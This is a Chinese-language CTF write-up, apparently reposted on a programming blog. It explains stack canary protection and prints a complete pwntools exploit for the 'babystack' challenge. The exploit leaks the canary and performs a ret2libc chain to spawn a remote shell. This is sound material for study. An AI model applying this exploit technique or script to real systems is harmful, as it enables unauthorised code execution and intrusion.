1. 全栈程序员必看首页

Canary保护

全栈程序员-站长 未分类 阅读 2

Canary保护之前做题没做过 canary 类型 今天补知识盲点遇到 canary 恰好也写一篇吧 学 pwn 时基本会遇到几种保护类型 如 RELRO PIE NX 还有 Canary 这里解释一下 canary 栈溢出保护是一种缓冲区溢出攻击缓解手段 当函数存在缓冲区溢出攻击漏洞时 攻击者可以覆盖栈上的返回地址来让 shellcode 能够得到执行 当启用栈保护后 函数开始执行的时候会先往栈里插入 cookie 信息 当函数真正返回的时候会验证 cookie 信息是否合法 如果不合法就停止程序运行 攻击者在覆盖返回地址的时候往往也会将 c

之前做题没做过canary类型,今天补知识盲点遇到canary,恰好也写一篇吧。

学pwn时基本会遇到几种保护类型,如RELRO,PIE,NX,还有Canary,这里解释一下canary。

栈溢出保护是一种缓冲区溢出攻击缓解手段,当函数存在缓冲区溢出攻击漏洞时,攻击者可以覆盖栈上的返回地址来让shellcode能够得到执行。当启用栈保护后,函数开始执行的时候会先往栈里插入cookie信息,当函数真正返回的时候会验证cookie信息是否合法,如果不合法就停止程序运行。攻击者在覆盖返回地址的时候往往也会将cookie信息给覆盖掉,导致栈保护检查失败而阻止shellcode的执行。在Linux中我们将cookie信息称为canary。

一大段子很烦,看图:32位情况下栈图,左边是正常的,右边是开了canary保护的情况。

Canary保护

进入函数后,也就是call完后会有push ebp,mov ebp,esp,最后来个mov esp。canary保护特殊在上述操作后会再加一个canary。最后函数leave ret前会检测一次,canary与原先值是否相同来判断是否被栈溢出覆盖返回地址了。

来道例题看看如何激活成功教程,常见一种方法就是puts出canary,我们得到他之后在原来的栈溢出上再加个canary就可以绕过了。

看一下攻防世界进阶区的pwn1。

打开checksec,开的很全,除了pie开全乎了。

打开ida

Canary保护

逻辑很简单,自己打开读一下就行了。

主要看一下真实的canary长啥样 。

这是main函数

Canary保护

 

f5下显示是 v6 = __readfsqword(0x28u); 汇编下 mov rax, fs:28h mov [rbp+var_8], rax

再看一下main结束时发生什么

Canary保护 

 看一下jz判断哪里,如果不相等就挑一个 stack check fail的函数

这下算是彻底清晰了

fs:xx中。FS寄存器指向当前活动线程的TEB结构(线程结构)

理论上来说,对于我们就是随机的,所以我们像绕过去栈溢出,一般是老老实实把canary得到。

canary还有一个特点,第一个字符为’\x00’,目的就是为了截断防止泄露出来canary。我们可以将其’\x00’覆盖为一个非零的值。这样就可以打印出canary了。该题利用的就是这一思路。

得到canary后的操作还是ret2libc的常规操作

exp如下:

from pwn import * from LibcSearcher import * p = remote('111.200.241.244',59735) elf = ELF("./babystack") puts_plt = elf.plt['puts'] puts_got = elf.got['puts'] main_addr = 0x0000000000 pop_rdi = 0x0000000000400a93 p.sendlineafter('>> ','1') payload = b'a' * (0x90 - 8) p.sendline(payload) # 等价于p.send('a' * 0x88 + '\n') p.sendlineafter('>> ','2') p.recvuntil('aaaa\n') canary = u64(p.recv(7).rjust(8,b'\x00')) payload1 = b'a' * (0x90 - 8) + p64(canary) + b'a' * 8 + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main_addr) p.sendlineafter('>> ',b'1') p.send(payload1) p.sendlineafter('>> ',b'3') puts_addr = u64(p.recv(6).ljust(8,b'\x00')) log.success("puts_addr +: " + hex(puts_addr) ) libc = LibcSearcher('puts', puts_addr) libc_base = puts_addr - libc.dump('puts') system = libc_base + libc.dump('system') binsh = libc_base + libc.dump('str_bin_sh') p.sendlineafter('>> ','1') payload2 = b'a' * (0x90 - 8) + p64(canary) + b'a' * 8 + p64(pop_rdi) + p64(binsh) + p64(system) p.send(payload2) p.sendlineafter('>> ','3') p.interactive()

其中注释那个等价我再带一嘴,read函数在读取时类似gets,会把空格也算入,除此以外还会把最后的换行符算入,也就是\n。(小声嘀咕:(第一次分清换行符和回车符,那个u64是咋算开头的空字符的,知识盲区了属于是)

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/231347.html原文链接:https://javaforall.net

(0)
0 0

关于作者

全栈程序员-站长的头像

全栈程序员-站长

133.5K 文章
3 粉丝
本网站汇聚当前互联网主流语音,持续更新,欢迎关注公众号“全栈程序员社区”
上一篇 2026年1月16日 下午6:01
下一篇 2026年1月16日 下午6:22


相关推荐

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号